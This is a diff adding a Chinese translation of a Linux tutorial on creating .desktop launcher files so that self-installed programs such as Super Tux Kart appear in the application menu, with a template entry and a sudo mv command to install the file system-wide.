@ -0,0 +1,89 @@
|
||||
为你的 Linux 应用创建 .Desktop 文件
|
||||
======
|
||||
在 Linux 中,一个 .desktop 文件就是一个用来运行程序的快捷方式。没有 .desktop 的话,你的应用就不会在应用菜单中显示了,也无法使用像 Synapse 和 Albert 这样的第三方启动起启动了。
|
||||
|
||||
大多数应用在安装后都会自动创建 .desktop 文件,并将自己放入应用菜单中以方便访问。然而,如果是你自己从源代码中编译的程序或者自己下载的压缩格式的应用,那就不会做这些事情了,每次你都需要打开终端来执行它的二进制文件。显然这个过程很无聊也很麻烦。
|
||||
|
||||
本文将会告诉你如何为应用创建 .desktop 文件,从而让你能在应用菜单中启动该应用。
|
||||
|
||||
**相关阅读**:[How to Add App Drawers to Unity Launcher in Ubuntu][1]
|
||||
|
||||
### 如何创建桌面启动器
|
||||
".desktop" 文件基本上就是一个包含程序信息的纯文本文件,通常根据是自己可见还是所有用户可见的不同而放在 "~/.local/share/applications" 或者 "/usr/share/applications/" 目录中。你在文件管理器中访问这两个目录,都会看到很多系统中已安装应用对应的 ".desktop" 文件存在。
|
||||
|
||||
为了演示,我将会为 Super Tux Kart 创建一个 .desktop 文件,这是一个我很喜欢玩的卡丁车竞赛游戏。Ubuntu 仓库中带了这个游戏,但版本一般不新。
|
||||
|
||||
要获得最新的版本就需要下载 tar 包,解压并执行其中的游戏启动文件。
|
||||
|
||||
你可以仿照这个步骤来为任何程序创建启动器。
|
||||
|
||||
**注意**:下面步骤假设程序压缩包放在 "Downloads" 目录下。
|
||||
|
||||
1。跳转到存放压缩包的目录,右击然后选择 "Extract here"。
|
||||
|
||||
![application-launcher-5][2]
|
||||
|
||||
2。解压后,进入新创建的目录然后找到可执行的文件。之后右击文件选择 "Run" 来启动程序,确定程序运行正常。
|
||||
|
||||
![application-launcher-6][3]
|
||||
|
||||
3。有时候,你在右键菜单中找不到 "Run" 选项。这通常是因为这个可执行文件是一个文本文件。你可以在终端中执行它,如果你使用 GNOME 的话,可以点击上面菜单栏中的 Files 菜单,然后选择 "Preferences"。
|
||||
|
||||
![application-launcher-linux-1][4]
|
||||
|
||||
4。选择 "Behavior" 标签页然后选择 "Executable Text Files" 下的 "Run them"。现在右击可执行文本文件后也能出现 "Run" 选项了。
|
||||
|
||||
![application-launcher-31][5]
|
||||
|
||||
5。确认应用运行正常后,就可以退出它了。然后运行你的文本编辑器并将下面内容粘贴到空文本文件中:
|
||||
```
|
||||
[Desktop Entry]
|
||||
Encoding=UTF-8
|
||||
Version=1.0
|
||||
Type=Application
|
||||
Terminal=false
|
||||
Exec=/path/to/executable
|
||||
Name=Name of Application
|
||||
Icon=/path/to/icon
|
||||
```
|
||||
|
||||
你需要更改 "Exec" 域的值为可执行文件的路径并且将 "Name" 域的值改成应用的名称。大多数的程序都在压缩包中提供了一个图标,不要忘记把它也填上哦。在我们这个例子中,Super Tux Kart 的启动文件看起来是这样的:
|
||||
|
||||
![application-launcher-supertuxkart][6]
|
||||
|
||||
6。将文件以 "application-name.desktop" 为名保存到 "~/.local/share/applications" 目录中。".local" 目录位于你的 Home 目录下,是一个隐藏目录,你需要启用 "Show Hidden Files" 模式才能看到它。如果你希望这个应用所有人都能访问,则在终端中运行下面命令:
|
||||
```
|
||||
sudo mv ~/.local/share/applications/<application-name.desktop> /usr/share/applications/
|
||||
```
|
||||
|
||||
当然,别忘了把命令中的 <application-name.desktop> 改成真实的 .desktop 文件名。
|
||||
|
||||
7。完成后,打开应用菜单,就能看到应用出现在其中,可以使用了。
|
||||
|
||||
![application-launcher-2][7]
|
||||
|
||||
这个方法应该适用于所有主流的 Linux 操作系统。下面是另一张 Super Tux Kart 在 elementary OS 的应用启动器 (slingshot) 上的截图
|
||||
|
||||
![application-launcher-4][8]
|
||||
|
||||
如果你觉得本教程还有点用的话,欢迎留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/create-desktop-file-linux/
|
||||
|
||||
作者:[Ayo Isaiah][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com/author/ayoisaiah/
|
||||
[1]:https://www.maketecheasier.com/add-app-drawer-unity-launcher-ubuntu/ (How to Add App Drawers to Unity Launcher in Ubuntu)
|
||||
[2]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-5.png (application-launcher-5)
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-6.png (application-launcher-6)
|
||||
[4]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-linux-1.png (application-launcher-linux-1)
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-31.png (application-launcher-31)
|
||||
[6]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-supertuxkart.png (application-launcher-supertuxkart)
|
||||
[7]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-2.jpg (application-launcher-2)
|
||||
[8]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-4.jpg (application-launcher-4)
|
Loading…
Reference in New Issue
Block a user